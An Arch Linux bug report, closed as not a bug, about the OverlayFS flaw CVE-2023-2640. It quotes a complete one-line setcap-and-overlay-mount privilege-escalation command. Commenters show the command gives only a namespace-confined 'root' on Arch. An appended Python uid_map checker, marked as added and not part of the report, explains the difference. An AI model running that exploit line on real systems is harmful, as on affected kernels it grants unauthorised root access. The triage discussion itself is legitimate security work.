
FS#79241 - *not* Vulnerable to CVE-2023-2640

Attached to Project: Arch Linux
Opened by Martijn Smits (Martmists) - Saturday, 29 July 2023, 10:06 GMT
Last edited by Toolybird (Toolybird) - Sunday, 30 July 2023, 22:07 GMT
Task Type Bug Report
Category Packages: Core
Status Closed
Assigned To Tobias Powalowski (tpowa)
Jan Alexander Steffens (heftig)
David Runge (dvzrv)
Levente Polyak (anthraxx)
Architecture x86_64
Severity Low
Priority High
Reported Version
Due in Version Undecided
Due Date Undecided
Percent Complete 100%
Votes 0
Private No

Details

Description: The kernel seems to be vulnerable to CVE-2023-2640


Additional info:
* package version(s): 6.4.7.arch1-1
* config and/or log files etc. N/A
* link to upstream bug report, if any
- https://nvd.nist.gov/vuln/detail/CVE-2023-2640
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640

Steps to reproduce:

1. Open a terminal or tty as unprivileged user
2. Run the following command:

unshare -rm bash -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/* && u/python3 -c 'import os;os.setuid(0);os.system(\"bash\")'"

3. You now have a bash session with uid and gid 0.

Closed by Toolybird (Toolybird)
Sunday, 30 July 2023, 22:07 GMT
Reason for closing: Not a bug
Additional comments about closing: See comments
Comment by Robin Candau (Antiz) - Saturday, 29 July 2023, 10:21 GMT
I can confirm, was able to reproduce on my side.

EDIT: I hadn't paid attention to the fact that the root shell is only opened within the user namespace. I removed my vote, ignore my confirmation.
Comment by Marco (jellybean) - Saturday, 29 July 2023, 12:27 GMT
> You now have

No, I don't

1 ss@archlinux ~ % ps aux | grep \[b]ash
ss 1805 0.0 0.1 7640 4096 pts/0 S 12:24 0:00 bash -c mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/* && u/python3 -c 'import os;os.setuid(0);os.system("bash")'
ss 1811 0.0 0.2 15308 8320 pts/0 S 12:24 0:00 u/python3 -c import os;os.setuid(0);os.system("bash")
ss 1813 0.0 0.1 7772 4480 pts/0 S 12:24 0:00 bash
ss 1833 0.0 0.1 7640 4096 pts/0 S 12:24 0:00 bash -c mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/* && u/python3 -c 'import os;os.setuid(0);os.system("bash")'
ss 1839 0.0 0.2 15308 8576 pts/0 S 12:24 0:00 u/python3 -c import os;os.setuid(0);os.system("bash")
ss 1840 0.0 0.1 7772 4608 pts/0 S+ 12:24 0:00 bash
Comment by loqs (loqs) - Saturday, 29 July 2023, 12:29 GMT
This was supposed to only affect kernels with a Ubuntu-specific patch [1]. Can you reproduce the steps from [2] and gain privileges outside the namespace?
If so, has upstream been contacted about the assessment that it is Ubuntu-only being incorrect? Has the commit in mainline that introduces the issue been identified?

[1] https://lore.kernel.org/all/CAODzB9p4_fh21bZoSMyMiF2QKDqE09kZ0b7mHR99LEw0mCF=ww%40mail.gmail.com/
[2] https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability#vulnerability-1-cve-2023-2640-ovl_copy_xattr-35
Comment by Jan Alexander Steffens (heftig) - Saturday, 29 July 2023, 21:10 GMT
Your command only gets you a "root" shell inside the user namespace, which you already had just running `unshare -rm bash`.

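A triage check for the point heftig makes above, added here as an example and not part of the bug report or of any Arch tooling: it parses a process's /proc/<pid>/uid_map to tell whether "uid 0" seen inside a user namespace is real root or just the unprivileged user who ran `unshare -r`. The sample maps are constructed, and `check_pid` is a hypothetical helper name.

```python
# Added example (not from the bug report): tell a user-namespace "root"
# apart from real root by consulting the kernel's uid_map for a process.
#
# /proc/<pid>/uid_map has lines of the form "<inside> <outside> <count>":
# uids <inside>..<inside>+count-1 in the process's user namespace map to
# <outside>..<outside>+count-1 in the namespace of whoever reads the file.
# After `unshare -r` as uid 1000 the map is "0 1000 1": uid 0 in the
# sandbox is uid 1000 on the host, so setuid(0) there grants nothing new.
from typing import Optional


def map_uid(uid_map_text: str, inside_uid: int) -> Optional[int]:
    """Translate a uid as seen inside a user namespace to the reader's
    namespace, or None if the uid is unmapped (the kernel then shows the
    overflow uid, normally 65534, for it)."""
    for line in uid_map_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        inside, outside, count = (int(f) for f in fields)
        if inside <= inside_uid < inside + count:
            return outside + (inside_uid - inside)
    return None


def is_real_root(uid_map_text: str, euid_in_ns: int = 0) -> bool:
    """True only if the given uid (default 0) maps to uid 0 in the reader's
    namespace. Read the map from the initial namespace to get host uids."""
    return map_uid(uid_map_text, euid_in_ns) == 0


def check_pid(pid: int) -> bool:
    """Hypothetical helper: read /proc/<pid>/uid_map and report whether
    uid 0 in that process's namespace is host root. Run it from outside
    the namespace (e.g. from the host user's own shell) for a real answer."""
    with open(f"/proc/{pid}/uid_map") as f:
        return is_real_root(f.read())


# Constructed sample maps, in the layout the kernel prints them:
HOST_MAP = "         0          0 4294967295\n"      # initial user namespace
UNSHARE_R_MAP = "         0       1000          1\n"  # `unshare -r` by uid 1000

if __name__ == "__main__":
    print("host uid 0 is root:", is_real_root(HOST_MAP))           # True
    print("sandbox uid 0 is root:", is_real_root(UNSHARE_R_MAP))   # False
    print("sandbox uid 0 on host is:", map_uid(UNSHARE_R_MAP, 0))  # 1000
```

The `ps aux` listing in jellybean's comment shows the same thing from the host side: every process, including the "root" bash, runs as the unprivileged user.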